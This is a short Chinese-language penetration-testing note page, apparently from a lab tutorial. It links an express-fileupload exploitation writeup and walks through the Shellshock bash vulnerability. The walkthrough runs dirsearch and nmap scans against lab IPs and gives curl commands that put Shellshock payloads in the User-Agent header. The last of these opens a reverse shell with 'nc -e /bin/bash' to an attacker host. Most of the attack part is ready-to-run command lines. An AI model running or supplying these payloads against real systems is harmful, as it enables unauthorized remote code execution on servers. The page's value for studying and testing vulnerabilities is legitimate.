漏洞利用

`express-fileupload`提权漏洞利用：

https://blog.p6.is/Real-World-JS-1/
简易利用代码

破壳漏洞

#Shell简介
#常用Shell
sh、bash、zsh、fish shell
#查看系统变量
env

echo $SHELL
echo $USER
echo $PATH

#定义环境变量
export x="Hello World"
#调用x变量
echo $x

#定义函数
w() {echo "Hello $USER, today is date: "; date; }
#调用w函数
w

####破壳漏洞原理######
#环境变量定义函数
export x="() { echo \"Hello $USER, today is date: \"; date; }"
#读取环境变量，并执行函数
bash -c 'x'

dirsearch -u http://10.0.0.17/cgi-bin/ -f -e cgi,sh

nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 10.0.2.36

如果发现存在破壳漏洞则

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'" \http://10.0.0.17/cgi-bin/shell.sh

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 10.0.0.14 5555'" \http://10.0.0.17/cgi-bin/shell.sh

最后更新于1年前

这有帮助吗？

漏洞利用

express-fileupload提权漏洞利用：

破壳漏洞

`express-fileupload`提权漏洞利用：